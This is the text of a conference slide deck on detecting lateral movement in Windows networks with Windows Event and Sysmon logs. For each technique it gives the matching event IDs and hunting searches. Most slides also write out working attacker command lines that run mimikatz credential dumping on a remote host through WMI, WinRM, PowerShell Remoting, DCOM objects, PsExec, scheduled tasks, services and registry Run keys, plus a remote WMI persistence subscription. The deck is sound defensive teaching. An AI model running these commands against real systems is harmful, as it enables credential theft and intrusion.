SlideShare a Scribd company logo

Kheirkhabarov24052017_phdays7

Download as PPTX, PDF
Teymur Kheirkhabarov
Teymur Kheirkhabarov

My presentation from Positive Hack Days 7 conference

Technology
1 of 54
Hunting Lateral Movement in Windows Infrastructure Teymur Kheirkhabarov
Who Am I • Senior SOC Analyst @Kaspersky Lab • SibSAU (Krasnoyarsk) graduate • Ex- Infosec dept. head • Ex- Infosec admin • Ex- System admin • Twitter @HeirhabarovT • www.linkedin.com/in/teymur-kheirkhabarov-73490867/
What are we going to talk about • Different ways to launch executables remotely by using compromised credentials and operating system functionality; • How to detect remotely launched executables with Windows Event and Sysmon logs.
Remote file copy over SMB • Copy to autostart locations for execution on login or boot • Copy to different locations for further execution via WMI, WinRM, Powershell Remoting, Task Scheduler, Service… • Programmatically • Using Explorer • Using standard console tools (copy, xcopy, ropocopy…): • robocopy C:tools pc0002ADMIN$userspublic mimikatz.exe • powershell Copy-Item -Path mimikatz.exe -Destination pc0002C$userspublic • cmd /c "copy mimikatz.exe pc0002C$userspublic" • xcopy mimikatz.exe pc0002C$ProgramDataMicrosoftWindowsStart MenuProgramsStartup How • TCP/455 port is accessible on remote host • Administrative shares are enabled on remote host Requirements & limitations
Remote File Copy over SMB – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Administrative share access (Windows EID 5140/5145) E4. File object access with WriteData or AddFile rights (Windows EID 4663) – if audit and SACL were configured
Remote File Copy over SMB – the most interesting events
Hunting: search for administrative shares connections
Windows File Auditing https://www.malwarearchaeology.com/s/Windows- File-Auditing-Cheat-Sheet-ver-Oct-2016.pdf
Hunting: search for files creation/changes in autostart locations
Remote execution via WMI • Programmatically • Using standard tools: • wmic /node:pc0002 process call create "cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" • powershell Invoke-WmiMethod -ComputerName pc0002 -Class Win32_Process - Name Create -ArgumentList '"cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt"' • powershell -command "&{$process = [WMICLASS]'pc0002ROOTCIMV2:win32_process'; $process.Create('calc.exe'); }" • powershell -command "&{$process = get-wmiobject -query 'SELECT * FROM Meta_Class WHERE __Class = "Win32_Process"' -namespace 'rootcimv2' - computername pc0002; $process.Create( 'notepad.exe' );}" How • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host Requirements & limitations
Remote execution via WMI – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. WmiPrvSE.exe starts payload file (Sysmon EID 1)
Remote execution via WMI – the most interesting events
Remote execution via WinRM • Programmatically • Using Windows Remote Shell (WinRS) tool: • winrs -r:pc0002.test.local C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit • winrs -r:pc0002.test.local -u:dadmin C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit How • WinRM is enabled on remote host (disabled by default on client Windows versions) • TCP/5985 (TCP/5986) port is accessible on remote host Requirements & limitations
Remote execution via WinRM – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. svchost.exe starts WinrsHost.exe (Sysmon EID 1) E4. WinrsHost.exe starts payload file (Sysmon EID 1)
Remote execution via WinRM – the most interesting events
Remote execution via Powershell Remoting • Powershell scripts • Powershell cmdline: • powershell Invoke-Command -ComputerName pc0002.test.local -ScriptBlock {cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicpc0002_mimikatz_output.txt } • powershell Invoke-Command -ComputerName pc0002.test.local -credential TESTdadmin -ScriptBlock {cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicpc0002_mimikatz_output.txt } • Enter-PSSession -ComputerName COMPUTER -Credential USER How • WinRM is enabled on remote host (disabled by default on client Windows versions) • TCP/5985 (TCP/5986) port is accessible on remote host Requirements & limitations
Remote execution via Powershell Remoting – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. svchost.exe starts wsmprovhost.exe (Sysmon EID 1) E4. wsmprovhost.exe starts payload file (Sysmon EID 1)
Remote execution via Powershell Remoting – the most interesting events
Remote execution via MMC20.Application COM How • Programmatically • Using powershell: powershell -command "&{$com=[activator]::CreateInstance([type]::GetTypeFromProgID('MMC20.Appli cation','pc0002.test.local')); $com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,'/c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicpc0002_mimikatz_output.txt','7')}" Requirements & limitations • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. svchost.exe starts mmc.exe (Sysmon EID 1) E4. mmc.exe starts payload file (Sysmon EID 1) Remote execution via MMC20.Application COM – events sequence on destination side
Remote execution via MMC20.Application COM – the most interesting events
Remote execution via PsExec (& clones, e.g. PaExec) • PsExex: • psexec.exe pc0002 -c mimikatz.exe privilege::debug sekurlsa::logonpasswords exit • PaExec: • paexec.exe pc0002 -c mimikatz.exe privilege::debug sekurlsa::logonpasswords exit How • ADMIN$ administrative share is enabled on remote host • TCP/445 port is accessible on remote host Requirements & limitations
E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Copying PSEXESVC.exe to ADMIN$ (Windows EID 5140/5145) E4. psexesvc service is installed and started (Windows EID 7045/7036) Remote execution via PsExec (& clones) – events sequence on destination side E5. psexesvc.exe is started by services.exe (Sysmon EID 1) E6. psexesvc.exe starts payload file (Sysmon EID 1) E7. Interaction with payload stdin/stdout/stderr via SMB pipes (Windows EID 5145)
Remote execution via PsExec (& clones) – the most interesting events
Hunting: search for PsExec (& clones) artifacts – services
Hunting: search for PsExec (& clones) artifacts – access to pipes
Remote execution via PsExec (& clones) – the most interesting events
Hunting: search for executions in network logon sessions (WinRM, WMI, PsExec, Powershell Remoting, MMC20 COM)
Remote execution via ShellWindows COM How • Programmatically • Using powershell: powershell -command "&{$obj = [activator]::CreateInstance([Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF- A442-00A0C90A8F39','pc0002')); $obj.item().Document.Application.ShellExecute('cmd.exe','/c calc.exe','C:WindowsSystem32',$null,0)}" Requirements & limitations • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host • Execution with rights of currently logged user https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
Remote execution via ShellBrowserWindow COM How • Programmatically • Using powershell: powershell -command "&{$obj = [activator]::CreateInstance([Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1- 8455-00A0C91F3880','pc0002')); $obj.Document.Application.ShellExecute('cmd.exe','/c calc.exe','C:WindowsSystem32',$null,0)}" Requirements & limitations • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host • Doesn’t work for Windows 7 destination • Execution with rights of currently logged user https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) Remote execution via ShellWindows or ShellBrowserWindow COM – events sequence on destination side E3. explorer.exe starts payload file in current session (Sysmon EID 1)
Remote execution via via ShellWindows or ShellBrowserWindow COM – how to detect??? Payload file is executed in the session of the current active user
Remote execution via Scheduled Tasks • Programmatically • Standard command line tools: • at 172.16.205.14 3:55 C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> win_mimikatz_output.txt • schtasks /create /S pc0002 /SC ONCE /ST 00:57:00 /TN "Adobe Update" /TR "cmd.exe /c C:userspublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" How • TCP/135 port and RPC dynamic port range are accessible on remote host (in case of Schtasks usage) • TCP/445 port is accessible on remote host (in case of AT usage) Requirements & limitations
Remote execution via Scheduled Tasks – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Access to atsvc SMB Pipe (Windows EID 5145) – in case of at.exe usage E6. taskeng.exe starts payload file (Sysmon EID 1) E4. Scheduled task is created or updated (Windows EID 4698/4702) E5. Task is triggered. svchost.exe starts taskeng.exe (Sysmon EID 1) Also there are some interesting events in Microsoft-Windows-TaskScheduler/Operational log
Remote execution via Scheduled Tasks – the most interesting events
Hunting: search for remotely created or updated scheduler tasks
Remote execution via Scheduled Tasks – the most interesting events
Hunting: search for ATSVC pipe connections
Remote execution via Services • Programmatically • Standard command line tool: • sc pc0002 create "Remote service" binPath= "cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" sc pc0002 start "Remote service" sc pc0002 delete »Remote service" How • TCP/135 port is accessible on remote host • RPC dynamic port range is accessible on remote host Requirements & limitations
Remote execution via Services – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. New service is installed (Windows EID 7045/4697) E4. Start command is sent to installed service. services.exe starts payload file (Sysmon EID 1) E5. A timeout is reached (Windows EID 7009) E6. Failure while trying to start service (Windows EID 7000)
Remote execution via Services – the most interesting events
Hunting: search for remotely created services
Remote registry How • Programmatically • Using powershell or reg: • reg add pc0002HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /f /v GoogleUpdater /t REG_SZ /d "cmd /c C:UsersPublicmimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> C:UsersPublicresult.txt" • powershell -command "&{$reg=[Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey("LocalMachin e", "pc0002"); $key=$reg.OpenSubKey("SOFTWAREMicrosoftWindowsCurrentVersionRu n",$True); $key.SetValue("GoogleUpdater","calc.exe");}" Requirements & limitations • TCP/445 port is accessible on remote host • Remote Registry service is enabled on remote host
Remote registry – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. WINREG pipe access (Windows EID 5145) E4. Registry value is modified (Windows EID 4657) – if audit and SACL were configured
Remote Registry – the most interesting events
Hunting: search for WINREG pipe connections
Windows Registry Auditing https://www.malwarearchaeology.com/s/Windows- Registry-Auditing-Cheat-Sheet-ver-Oct-2016.pdf
Hunting: search for changes in autostart registry keys
Remote WMI subscriptions creation $filterName = 'TestFilter’ $consumerName = 'TestConsumer’ $exePath = 'C:WindowsSystem32calc.exe' $Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320" $WMIEventFilter = Set-WmiInstance -ComputerName pc0002 -Class __EventFilter - NameSpace "rootsubscription" -Arguments @{Name=$filterName;EventNameSpace="rootcimv2";QueryLanguage="WQL";Query=$ Query} -ErrorAction Stop $WMIEventConsumer = Set-WmiInstance -ComputerName pc0002 -Class CommandLineEventConsumer -Namespace "rootsubscription" -Arguments @{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath} Set-WmiInstance -ComputerName pc0002 -Class __FilterToConsumerBinding -Namespace "rootsubscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
WMI Namespaces Auditing
Remote WMI subscriptions creation – events sequence on destination side E2. Special privileges assigned to new logon (Windows EID 4672) E1. Network Logon (Windows EID 4624) E3. Writing to WMI Namespace (Windows EID 4662) – if audit and SACL were configured
Remote WMI subscriptions creation – the most interesting events
The End  There are a lot of ways to remotely run executables in Windows infrastructure;  Most of them are based on the native capabilities of the Windows operating system;  Almost all of them can be detected via Windows or Sysmon logs analysis;  Out of scope: • exploitation of vulnerabilities; • third-party applications and software deployment systems (SCCM, Kaspersky Security Center, VNC, WSUS…).
Teymur Kheirkhabarov • Twitter @HeirhabarovT • http://www.linkedin.com/in/teymur-kheirkhabarov-73490867/

Recommended

A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter HimselfTeymur Kheirkhabarov
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentTeymur Kheirkhabarov
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabTeymur Kheirkhabarov
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter HimselfSergey Soldatov
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingDhruv Majumdar
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked LookJason Lang
 

Recommended

A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter HimselfTeymur Kheirkhabarov
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentTeymur Kheirkhabarov
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabTeymur Kheirkhabarov
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter HimselfSergey Soldatov
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingDhruv Majumdar
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked LookJason Lang
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceVishal Kumar
 
Automating the mundanity of technique IDs with ATT&CK Detections Collector
Automating the mundanity of technique IDs with ATT&CK Detections CollectorAutomating the mundanity of technique IDs with ATT&CK Detections Collector
Automating the mundanity of technique IDs with ATT&CK Detections CollectorMITRE ATT&CK
 
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...MITRE - ATT&CKcon
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingNikhil Mittal
 
Threat hunting and achieving security maturity
Threat hunting and achieving security maturityThreat hunting and achieving security maturity
Threat hunting and achieving security maturityDNIF
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with SplunkSplunk
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
 
Building an InfoSec RedTeam
Building an InfoSec RedTeamBuilding an InfoSec RedTeam
Building an InfoSec RedTeamDan Vasile
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat HuntingGIBIN JOHN
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016Matthew Dunwoody
 
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...MITRE - ATT&CKcon
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules CoverageSunny Neo
 
Cyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopCyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopDigit Oktavianto
 
Threat Hunting Report
Threat Hunting Report Threat Hunting Report
Threat Hunting Report Morane Decriem
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
Knowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CKKnowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CKMITRE ATT&CK
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkSqrrl
 
Adversary Emulation Workshop
Adversary Emulation WorkshopAdversary Emulation Workshop
Adversary Emulation Workshopprithaaash
 
The Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query LanguageThe Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query LanguageRoss Wolf
 
What is Threat Hunting? - Panda Security
What is Threat Hunting? - Panda SecurityWhat is Threat Hunting? - Panda Security
What is Threat Hunting? - Panda SecurityPanda Security
 
Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE Dragos, Inc.
 
Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#Mauricio Velazco
 

More Related Content

What's hot

Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceVishal Kumar
 
Automating the mundanity of technique IDs with ATT&CK Detections Collector
Automating the mundanity of technique IDs with ATT&CK Detections CollectorAutomating the mundanity of technique IDs with ATT&CK Detections Collector
Automating the mundanity of technique IDs with ATT&CK Detections CollectorMITRE ATT&CK
 
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...MITRE - ATT&CKcon
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingNikhil Mittal
 
Threat hunting and achieving security maturity
Threat hunting and achieving security maturityThreat hunting and achieving security maturity
Threat hunting and achieving security maturityDNIF
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with SplunkSplunk
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
 
Building an InfoSec RedTeam
Building an InfoSec RedTeamBuilding an InfoSec RedTeam
Building an InfoSec RedTeamDan Vasile
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat HuntingGIBIN JOHN
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016Matthew Dunwoody
 
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...MITRE - ATT&CKcon
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules CoverageSunny Neo
 
Cyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopCyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopDigit Oktavianto
 
Threat Hunting Report
Threat Hunting Report Threat Hunting Report
Threat Hunting Report Morane Decriem
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
Knowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CKKnowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CKMITRE ATT&CK
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkSqrrl
 
Adversary Emulation Workshop
Adversary Emulation WorkshopAdversary Emulation Workshop
Adversary Emulation Workshopprithaaash
 
The Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query LanguageThe Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query LanguageRoss Wolf
 
What is Threat Hunting? - Panda Security
What is Threat Hunting? - Panda SecurityWhat is Threat Hunting? - Panda Security
What is Threat Hunting? - Panda SecurityPanda Security
 

What's hot (20)

Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement Matrice
 
Automating the mundanity of technique IDs with ATT&CK Detections Collector
Automating the mundanity of technique IDs with ATT&CK Detections CollectorAutomating the mundanity of technique IDs with ATT&CK Detections Collector
Automating the mundanity of technique IDs with ATT&CK Detections Collector
 
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple Teaming
 
Threat hunting and achieving security maturity
Threat hunting and achieving security maturityThreat hunting and achieving security maturity
Threat hunting and achieving security maturity
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with Splunk
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
 
Building an InfoSec RedTeam
Building an InfoSec RedTeamBuilding an InfoSec RedTeam
Building an InfoSec RedTeam
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016
 
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules Coverage
 
Cyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopCyber Threat Hunting Workshop
Cyber Threat Hunting Workshop
 
Threat Hunting Report
Threat Hunting Report Threat Hunting Report
Threat Hunting Report
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
Knowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CKKnowledge for the masses: Storytelling with ATT&CK
Knowledge for the masses: Storytelling with ATT&CK
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your Network
 
Adversary Emulation Workshop
Adversary Emulation WorkshopAdversary Emulation Workshop
Adversary Emulation Workshop
 
The Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query LanguageThe Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query Language
 
What is Threat Hunting? - Panda Security
What is Threat Hunting? - Panda SecurityWhat is Threat Hunting? - Panda Security
What is Threat Hunting? - Panda Security
 

Similar to Kheirkhabarov24052017_phdays7

Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE Dragos, Inc.
 
Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#Mauricio Velazco
 
A complete guide to Node.js
A complete guide to Node.jsA complete guide to Node.js
A complete guide to Node.jsPrabin Silwal
 
Owning computers without shell access 2
Owning computers without shell access 2Owning computers without shell access 2
Owning computers without shell access 2Royce Davis
 
Lee Myers - What To Do When Nagios Notification Don't Meet Your Needs.
Lee Myers - What To Do When Nagios Notification Don't Meet Your Needs.Lee Myers - What To Do When Nagios Notification Don't Meet Your Needs.
Lee Myers - What To Do When Nagios Notification Don't Meet Your Needs.Nagios
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkEC-Council
 
Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016Xavier Ashe
 
Tick Stack - Listen your infrastructure and please sleep
Tick Stack - Listen your infrastructure and please sleepTick Stack - Listen your infrastructure and please sleep
Tick Stack - Listen your infrastructure and please sleepGianluca Arbezzano
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
 
Exploiting Llinux Environment
Exploiting Llinux EnvironmentExploiting Llinux Environment
Exploiting Llinux EnvironmentEnrico Scapin
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...Zoltan Balazs
 
HashiCorp Vault Workshop:幫 Credentials 找個窩
HashiCorp Vault Workshop:幫 Credentials 找個窩HashiCorp Vault Workshop:幫 Credentials 找個窩
HashiCorp Vault Workshop:幫 Credentials 找個窩smalltown
 
Time Series Database and Tick Stack
Time Series Database and Tick StackTime Series Database and Tick Stack
Time Series Database and Tick StackGianluca Arbezzano
 
How to measure your security response readiness?
How to measure your security response readiness?How to measure your security response readiness?
How to measure your security response readiness?Tomasz Jakubowski
 
Get started with docker &amp; dev ops
Get started with docker &amp; dev opsGet started with docker &amp; dev ops
Get started with docker &amp; dev opsAsya Dudnik
 
Journey to the Cloud
Journey to the CloudJourney to the Cloud
Journey to the CloudNadeem Ahmad
 
HCK-CI: Enabling CI for Windows Guest Paravirtualized Drivers - Kostiantyn Ko...
HCK-CI: Enabling CI for Windows Guest Paravirtualized Drivers - Kostiantyn Ko...HCK-CI: Enabling CI for Windows Guest Paravirtualized Drivers - Kostiantyn Ko...
HCK-CI: Enabling CI for Windows Guest Paravirtualized Drivers - Kostiantyn Ko...Yan Vugenfirer
 
Practical Operation Automation with StackStorm
Practical Operation Automation with StackStormPractical Operation Automation with StackStorm
Practical Operation Automation with StackStormShu Sugimoto
 
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...CODE BLUE
 

Similar to Kheirkhabarov24052017_phdays7 (20)

Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE
